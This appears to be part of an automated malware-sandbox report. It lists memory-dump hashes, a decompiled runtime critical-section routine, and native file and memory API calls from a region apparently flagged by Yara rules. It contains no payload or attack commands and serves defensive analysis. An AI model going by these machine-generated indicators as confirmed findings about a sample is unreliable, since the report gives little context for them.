                                                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                            • Instruction Fuzzy Hash: 0BC02BB4150440FBDB151F30CE10F147294F704A21FB403947230C94F0D5689C00E100
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                            • Instruction ID: 9b63248463888ee4f48eb494b9940e1d15c191ad9e21d8022069ec6ad29e1a0d
                                                                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                            • Instruction Fuzzy Hash: 6BC08C711591805AEF2A670CCE20B243A90BB0C60CF6801DCEAC1094A2C768A822C608
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                            • Instruction ID: e0cfb1ef96fcf7a37d4a6e94ecf9c3fe2cb8d54a283080decae9218d43c2409e
                                                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                            • Instruction Fuzzy Hash: C2B092363129408FCF56EF18C090B1533F4BB44A40B8400D0E400CBA21D229E800A900
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                            • Instruction ID: f4803bae2ca2c951464f1427aa90fe8d60f3c8c77ea1aab6da81388f8254a885
                                                                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                            • Instruction Fuzzy Hash: CFB01232C10441CFCF02FF40CA10B5A7331FB40750F054490904127930C228AC01CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ae7dbeb1b12882307404d71f798abc7fa83c5f900958c3b08ac1b0eabeba43bd
                                                                            • Instruction ID: 17f72776792537d76f2590eb7752ccd1ba0141aa8153875c105b5d3e3ab7bbd3
                                                                            • Opcode Fuzzy Hash: ae7dbeb1b12882307404d71f798abc7fa83c5f900958c3b08ac1b0eabeba43bd
                                                                            • Instruction Fuzzy Hash: E09002B120140903D2406699884460B0105A7D0742F51C025A2454595ECA698C5176B5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 835b298409e68d745bab31ea34838574313055002771d558d0688483d47bf412
                                                                            • Instruction ID: e2c1648e2a688ae970009b4d0febf24b5372e472eaf9c87d116f177c39bd605d
                                                                            • Opcode Fuzzy Hash: 835b298409e68d745bab31ea34838574313055002771d558d0688483d47bf412
                                                                            • Instruction Fuzzy Hash: E59002B121100542D2046299844470A0145A7E1641F51C026A2544594CC5698C6166A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 554a5e8e3289f68a42c2f4b6dba9cb45a69158a8cb612fdcb5afd4b84b5a6639
                                                                            • Instruction ID: faefe497dab7ffe1d0ee98c8901d6f2cf1be88d43ac1d29c8813efb79a289a31
                                                                            • Opcode Fuzzy Hash: 554a5e8e3289f68a42c2f4b6dba9cb45a69158a8cb612fdcb5afd4b84b5a6639
                                                                            • Instruction Fuzzy Hash: C590027124100902D2417299844460A0109B7D0681F91C026A0814594EC6958A56BFE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3606e5973ce84621100e85359f006ec3b53f3d368d337d97dcb7abf7f6e50d87
                                                                            • Instruction ID: 8e00ca31fcabcc2f96584dc992cd49c694031d274435c26b60769f864c9a3ea4
                                                                            • Opcode Fuzzy Hash: 3606e5973ce84621100e85359f006ec3b53f3d368d337d97dcb7abf7f6e50d87
                                                                            • Instruction Fuzzy Hash: ED9002B1601145434640B299884440A5115B7E1741391C135A08445A0CC6A88855A7E5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 57a3c3cd33fc51202964086180ef17e94d275bfe7d7ffb486413619f63e653de
                                                                            • Instruction ID: 746c786f263a81dda4fe951936d6f2d8114d153eb26c65b9d21b705bdf8beb67
                                                                            • Opcode Fuzzy Hash: 57a3c3cd33fc51202964086180ef17e94d275bfe7d7ffb486413619f63e653de
                                                                            • Instruction Fuzzy Hash: E790027130100902D2026299845460A0109E7D1785F91C026E1814595DC6658953B6B2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e94e05dc9d015f39af817e31d80b7e794c7bc0882137703d6c51118e5dc12fac
                                                                            • Instruction ID: 1bbc17357d1379937671acd41eb719ea206fa7328e96f642f5b12e45e3452f16
                                                                            • Opcode Fuzzy Hash: e94e05dc9d015f39af817e31d80b7e794c7bc0882137703d6c51118e5dc12fac
                                                                            • Instruction Fuzzy Hash: D690027124100D02D2407299C45470B0106E7D0A41F51C025A0414594DC65689657BF1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e591fbbea72f433d701271c78465e81ebc6ad8e1cae459ff8231e38a210c4210
                                                                            • Instruction ID: 3fb450751bb16408d43eb60583162e6c107fc55de7abcf84ced89df9c2212e03
                                                                            • Opcode Fuzzy Hash: e591fbbea72f433d701271c78465e81ebc6ad8e1cae459ff8231e38a210c4210
                                                                            • Instruction Fuzzy Hash: 5390027120144502D2407299C48460F5105B7E0741F51C425E0815594CC6558856A7A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5aaee9d59481514cc497945d3eb6380d94db206ac613a0f43f04c59153e3faaa
                                                                            • Instruction ID: b1654e5baea6be717d5aff36d6fefb976a399fae243ff165f9ffd43181f23130
                                                                            • Opcode Fuzzy Hash: 5aaee9d59481514cc497945d3eb6380d94db206ac613a0f43f04c59153e3faaa
                                                                            • Instruction Fuzzy Hash: B390027120140902D2006299884874B0105A7D0742F51C025A5554595EC6A5C8917AB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 149a64766829221c466a90978297bafea02d47743fd18d076d70e40229698b81
                                                                            • Instruction ID: fdd0e155377c4ecd98a12d76defb8c9fffffb7232e5d0a4312e9a8c712a663af
                                                                            • Opcode Fuzzy Hash: 149a64766829221c466a90978297bafea02d47743fd18d076d70e40229698b81
                                                                            • Instruction Fuzzy Hash: 8F90027120144942D24063998844B0F4205A7E1642F91C02DA4546594CC95588556BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 272504088ed59457da55470ded1802f6dcb0bcce70b8edacc78bfdab86192ac8
                                                                            • Instruction ID: 7349aafaac539ab36b2b3cd5c05e69c73f570c119635e7942c6f6bb2955e712d
                                                                            • Opcode Fuzzy Hash: 272504088ed59457da55470ded1802f6dcb0bcce70b8edacc78bfdab86192ac8
                                                                            • Instruction Fuzzy Hash: DE9002F1201145924600A399C444B0E4605A7E0641B51C02AE14445A0CC5658851A6B5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 95e9646cb9b3334752b6dfe0dc9f4ea7dcfcc49c65a3497997088f288170a771
                                                                            • Instruction ID: 8cc03a40c829bce0e5a3e4f4e513d7ea85f3f40c1293385db56def036256ae35
                                                                            • Opcode Fuzzy Hash: 95e9646cb9b3334752b6dfe0dc9f4ea7dcfcc49c65a3497997088f288170a771
                                                                            • Instruction Fuzzy Hash: 5B900271A050051292407299885464A4106B7E0B81B55C025A0904594CC9948A5567E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9ddffbeb38a5c50ca4df2b5f2506af1d9220160272376ef390b2f3af2be1ab58
                                                                            • Instruction ID: 58d2e88c335bc042c2b6d49b34a5c11c93489eaa666beab1cddce4b8290f812c
                                                                            • Opcode Fuzzy Hash: 9ddffbeb38a5c50ca4df2b5f2506af1d9220160272376ef390b2f3af2be1ab58
                                                                            • Instruction Fuzzy Hash: 9A900275221005020245A699464450F0545B7D6791391C029F18065D0CC661886567A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1f7b6966597dc987924db0ac3125a3aad42612cc27f2a21d93b109cf720279b7
                                                                            • Instruction ID: 843f91c7c16f87622db5057cd5d9cf32b58cd95071af6d075e47ffa79dc379b8
                                                                            • Opcode Fuzzy Hash: 1f7b6966597dc987924db0ac3125a3aad42612cc27f2a21d93b109cf720279b7
                                                                            • Instruction Fuzzy Hash: 2F90027120100D02D2046299884468A0105A7D0741F51C025A6414695ED6A5889176B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 53%
                                                                            			E0110FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                            				void* _t7;
                                                                            				intOrPtr _t9;
                                                                            				intOrPtr _t10;
                                                                            				intOrPtr* _t12;
                                                                            				intOrPtr* _t13;
                                                                            				intOrPtr _t14;
                                                                            				intOrPtr* _t15;
                                                                            
                                                                            				_t13 = __edx;
                                                                            				_push(_a4);
                                                                            				_t14 =  *[fs:0x18];
                                                                            				_t15 = _t12;
                                                                            				_t7 = E010BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                            				_push(_t13);
                                                                            				E01105720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                            				_t9 =  *_t15;
                                                                            				if(_t9 == 0xffffffff) {
                                                                            					_t10 = 0;
                                                                            				} else {
                                                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                            				}
                                                                            				_push(_t10);
                                                                            				_push(_t15);
                                                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                            				return E01105720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                            			}











                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0110FDFA
                                                                            Strings
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0110FE01
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0110FE2B
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                            • API String ID: 885266447-3903918235
                                                                            • Opcode ID: 5693ed3271e3c8cb06e5443109a2c780000bf45635acdbca1f599ea595b04d61
                                                                            • Instruction ID: 7b9bb6222e35a15e651dc6387d24467f2026d5ce81bb17ff1a772b468e550579
                                                                            • Opcode Fuzzy Hash: 5693ed3271e3c8cb06e5443109a2c780000bf45635acdbca1f599ea595b04d61
                                                                            • Instruction Fuzzy Hash: 38F0F632600602BFE6291A45DC06F63BF5AEB44B70F150314F6685A1D1DAA2FC2096F0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Executed Functions

                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00133BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00133BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0013861D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: .z`
                                                                            • API String ID: 823142352-1441809116
                                                                            • Opcode ID: fa4d3fe93a5bd96e72967c4d0221322ce0d1c4d2c002e3a71f875b488435deae
                                                                            • Instruction ID: 0b281f4a3ae1725dad72171a3b2ec18adc036d38d532ae62eeecfda721eb6b11
                                                                            • Opcode Fuzzy Hash: fa4d3fe93a5bd96e72967c4d0221322ce0d1c4d2c002e3a71f875b488435deae
                                                                            • Instruction Fuzzy Hash: 3A01B2B2215108AFCB08DF88DC85EEB77E9AF8C754F158248FA0D97241C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00133BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00133BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0013861D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: .z`
                                                                            • API String ID: 823142352-1441809116
                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction ID: a7ef3a498b241615aac4b25ff4db2189dfd841fbae196f5c54229cb325248446
                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction Fuzzy Hash: B2F0B2B2200208ABCB08DF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtReadFile.NTDLL(00133D82,5E972F65,FFFFFFFF,00133A41,?,?,00133D82,?,00133A41,FFFFFFFF,5E972F65,00133D82,?,00000000), ref: 001386C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 2d020790991105bb80e00e24b9279485b7ced82ad1456c299bb63c61b104a32a
                                                                            • Instruction ID: 79f47600832baffcf24e43a67a3383fcab6a4e0bb2caaef0bd523e6e3cd7def3
                                                                            • Opcode Fuzzy Hash: 2d020790991105bb80e00e24b9279485b7ced82ad1456c299bb63c61b104a32a
                                                                            • Instruction Fuzzy Hash: 001116B6204109AFCB18DFA9DC85DEB77ADEF8C350F158648FA5DD7241C630E8128BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtReadFile.NTDLL(00133D82,5E972F65,FFFFFFFF,00133A41,?,?,00133D82,?,00133A41,FFFFFFFF,5E972F65,00133D82,?,00000000), ref: 001386C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: f0122490124dfe175d076c63a8d3a45a62035b2e880e092d42bed573bbcf04a1
                                                                            • Instruction ID: 7970c5208b5184edc44013e297453ca28d6d9d9f054e55e4ec3b85e213d91c8b
                                                                            • Opcode Fuzzy Hash: f0122490124dfe175d076c63a8d3a45a62035b2e880e092d42bed573bbcf04a1
                                                                            • Instruction Fuzzy Hash: FF0121B2200118ABCB18DF98CC85EEB77A9EF8C350F158559FE1DA7241C670E910CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtReadFile.NTDLL(00133D82,5E972F65,FFFFFFFF,00133A41,?,?,00133D82,?,00133A41,FFFFFFFF,5E972F65,00133D82,?,00000000), ref: 001386C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction ID: 938d03b3cc99ec28d11155f1d44bad665e596bbb18e0c9dc96f2c4bf67b02ace
                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction Fuzzy Hash: F6F0BDB2200108AFCB14DF89DC85DEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 001387E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 898c9e11fb8f3c905fc59e532917137ddf4d15496f3f1f1a217f278cd05a4577
                                                                            • Instruction ID: 8f2cb019399cdf17dc8a08d8a124ac7b707b33dc77e6a2e4e87026a4f44f4723
                                                                            • Opcode Fuzzy Hash: 898c9e11fb8f3c905fc59e532917137ddf4d15496f3f1f1a217f278cd05a4577
                                                                            • Instruction Fuzzy Hash: 83F0F8B6200109ABDB14DF99DC84EA777A9BF98260F158249BA08A7241C631E911CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 001387E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction ID: 3eaeb1d066daf3af960783d91a989434583b11ced1be3efa1c9a9d9ea9503854
                                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction Fuzzy Hash: 43F015B2200208ABCB18DF89CC81EAB77ADAF88750F118148BE08A7241C630F810CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtClose.NTDLL(00133D60,?,?,00133D60,00000000,FFFFFFFF), ref: 00138725
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtClose.NTDLL(00133D60,?,?,00133D60,00000000,FFFFFFFF), ref: 00138725
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
